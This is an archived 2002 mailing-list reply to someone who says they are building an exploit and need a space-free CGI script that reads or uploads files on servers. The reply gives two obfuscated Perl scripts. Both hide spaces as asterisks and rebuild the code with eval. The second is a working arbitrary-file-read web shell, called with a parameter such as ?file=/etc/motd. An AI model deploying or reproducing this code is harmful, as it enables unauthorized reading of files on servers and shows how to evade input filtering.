Re: Coding Conservative CGI Perl

[Pete Krawczyk <petek () bsod net>]

From: Justin Lavoie <acid_rain () programmer net>
Date: Mon, 10 Jun 2002 00:27:05 -0500
Subject: Coding Conservative CGI Perl

}I'm working on a type of exploit and in doing so I must develop a *.cgi
}file that'd run on a Linux and Windows box to allow me to read or upload
}file (whatever is possible) without the use of spaces!

Well, what would be wrong with:

--- O< ---
#!/usr/bin/perl
$g=q#print*"Content-type:*text/plain\n\n";print*"Test:*foo!\n";#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---

Or, to, say, read any file on a system:
--- O< ---
#!/usr/bin/perl
$g=q#use*CGI;$q=new*CGI;open(FILE,$q->param("file"))or*die("can't*open!\n");
print("Content-type:*text/plain\n\n");print(<FILE>);exit(0);#;
$g=~s/\*/chr(32)/eg;eval($g);die($@)if($@);exit(0);
--- O< ---
(change the MIME type as necessary)
and call with .cgi?file=/etc/motd

In this case, you'd replace every space with a * between the two hash
marks, and you would have to escape any hash mark or backslash you had,
but as you'll notice, you can do anything you'd like and have it convert
on the fly. You could even change the * to any other character if you'd
like.

Perl is very forgiving about most environments, and you can get around 
most restrictions if you try.

-Pete K
-- 
Pete Krawczyk
  petek at bsod dot net